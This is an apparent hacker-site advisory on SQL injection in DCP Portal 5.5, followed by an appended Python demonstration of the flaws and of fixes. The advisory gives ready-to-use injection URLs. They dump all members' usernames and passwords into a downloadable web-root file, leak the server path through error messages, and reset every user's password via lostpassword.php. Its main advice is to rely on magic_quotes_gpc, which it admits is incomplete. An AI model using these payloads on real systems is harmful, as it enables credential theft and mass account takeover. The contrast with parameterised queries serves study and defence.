
DCP Portal - 5.5 holes




Never run this product with magic_quotes_gpc turned off. It will not work at all with 
register_globals turned off, because its scripts read request parameters straight 
into global variables (which is also why adv_logged=1 can simply be supplied in 
the URL).

None of the files in the product validates its input variables, so they can be 
exploited with ordinary SQL injection techniques. For example, to get the 
username and password of every user, exploit advertiser.php.

Request it like this (the password value closes the string, appends a UNION 
that pulls the member table, and has MySQL write the result to a file under 
the web root, where it can then be downloaded):

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 
1=1 UNION select uid,name,password,surname,job,email from dcp5_members into 
outfile 'c:/apache2/htdocs/dcpad.txt

That is for Windows; if the web server runs on *nix, use something like:

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 
1=1 UNION select uid,name,password,surname,job,email from dcp5_members into 
outfile '/var/www/html/dcpad.txt

In both cases you need the absolute path of the document root. To find it, 
request

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password='

The unterminated quote makes the query fail, and if display_errors is on in 
php.ini the error message reveals the path on the server.

That's all! Note that the payload relies on UNION, which MySQL only supports 
from version 4.0 onward; INTO OUTFILE additionally requires the MySQL account 
to hold the FILE privilege, and the target file must not already exist. If the 
host is not running 4.x, no problem, there is another file.

This time it's lostpassword.php.

Request it like this:

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

This one really does damage: it resets everyone's password. The injected 
condition matches every member, so each user receives as many mails as there 
are users, and everyone ends up with the password from the last mail.

I didn't have time to check whether injection is possible through some numeric 
field. If it is, one can launch select-fish attacks, which would work even when 
magic_quotes_gpc is on.

Fix: instead of fixing the code, simply turn on magic_quotes_gpc. Otherwise it 
will take you as long as it took them to write DCP Portal. Bear in mind that 
magic_quotes_gpc only escapes quote characters, so it does nothing against 
injection into unquoted numeric fields.
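To make the injections above concrete, here is an added example. It is not part of the advisory and not DCP Portal code: it rebuilds the vulnerable query patterns over a constructed in-memory SQLite table named dcp5_members, runs the advisory's advertiser.php and lostpassword.php payloads against them, and shows the two fixes side by side, namely the quote escaping that magic_quotes_gpc provides (SQLite doubles quotes where MySQL backslash-escapes them, so quote_escape is the SQLite analogue of addslashes) and bound parameters. INTO OUTFILE is dropped because SQLite has no equivalent. The column list, the sample rows, the lostpassword.php loop and the numeric uid lookup are assumptions standing in for code that is not on the page. It also covers the numeric-field case mentioned above, which quote escaping cannot stop.

```python
import sqlite3

# Constructed stand-in for DCP Portal's dcp5_members table. Assumption: the six
# column names are taken from the advisory's UNION payload; the real schema is
# not on the page, and the sample rows are made up.
MEMBERS = [
    (1, "alice", "s3cret", "Smith", "admin", "alice@example.org"),
    (2, "bob", "hunter2", "Jones", "editor", "bob@example.org"),
    (3, "carol", "letmein", "Lee", "advertiser", "carol@example.org"),
]

# Payloads from the advisory, minus INTO OUTFILE (SQLite has no equivalent) and
# ended with a SQL comment so the query's own closing quote is swallowed.
STRING_PAYLOAD = ("qwe' or 1=1 UNION select uid,name,password,surname,job,email "
                  "from dcp5_members --")
LOSTPW_PAYLOAD = "fake' or 1=1--"
NUMERIC_PAYLOAD = "1 or 1=1"   # no quote characters: magic_quotes_gpc never sees it


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dcp5_members (uid INTEGER, name TEXT, password TEXT, "
                 "surname TEXT, job TEXT, email TEXT)")
    conn.executemany("INSERT INTO dcp5_members VALUES (?, ?, ?, ?, ?, ?)", MEMBERS)
    return conn


def quote_escape(s):
    """SQLite analogue of magic_quotes_gpc: neutralise quote characters inside a
    string value (MySQL/addslashes backslash-escapes them, SQLite doubles them)."""
    return s.replace("'", "''")


def login_vulnerable(conn, username, password):
    """Query built by string concatenation, as the advisory says DCP Portal does."""
    sql = ("SELECT uid,name,password,surname,job,email FROM dcp5_members "
           "WHERE name='%s' AND password='%s'" % (username, password))
    return conn.execute(sql).fetchall()


def login_escaped(conn, username, password):
    """Same query after the quote escaping magic_quotes_gpc would apply."""
    return login_vulnerable(conn, quote_escape(username), quote_escape(password))


def login_parameterised(conn, username, password):
    """Real fix: bound parameters never become part of the SQL text."""
    sql = ("SELECT uid,name,password,surname,job,email FROM dcp5_members "
           "WHERE name=? AND password=?")
    return conn.execute(sql, (username, password)).fetchall()


def lost_password_vulnerable(conn, email):
    """Assumed reconstruction of the lostpassword.php loop the advisory describes:
    one SELECT to find matching members, then per match an UPDATE and a mail to
    every matching address, all reusing the raw email parameter.
    Returns the (recipient, new password) mails that would have been sent."""
    where = "email='%s'" % email
    matches = conn.execute("SELECT uid FROM dcp5_members WHERE " + where).fetchall()
    mails = []
    for n, _ in enumerate(matches):
        newpw = "reset%d" % n      # stands in for a random password
        conn.execute("UPDATE dcp5_members SET password='%s' WHERE %s" % (newpw, where))
        for (rcpt,) in conn.execute("SELECT email FROM dcp5_members WHERE " + where):
            mails.append((rcpt, newpw))
    return mails


def profile_vulnerable(conn, uid):
    """Numeric field concatenated without quotes: quote escaping cannot help here."""
    sql = "SELECT uid,name,email FROM dcp5_members WHERE uid=%s" % quote_escape(uid)
    return conn.execute(sql).fetchall()


def profile_parameterised(conn, uid):
    """Validate the integer and bind it, so '1 or 1=1' is rejected outright."""
    if not uid.isdigit():
        return []
    sql = "SELECT uid,name,email FROM dcp5_members WHERE uid=?"
    return conn.execute(sql, (int(uid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("dump via login:", login_vulnerable(db, "1", STRING_PAYLOAD))
    print("escaped:", login_escaped(db, "1", STRING_PAYLOAD))
    print("numeric, escaped:", profile_vulnerable(db, NUMERIC_PAYLOAD))
    print("mails sent:", lost_password_vulnerable(db, LOSTPW_PAYLOAD))
```

Run it with python3: the first call returns every member row through the login query, the escaped and parameterised versions return nothing, and the lost-password loop produces nine mails for three members and leaves all three with the last password generated. The numeric lookup is the case the fix above cannot cover: the payload contains no quote, so quote_escape passes it through unchanged and every row comes back, while the validating, bound version rejects it.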

-lifofifo
http://www.hackingzone.org/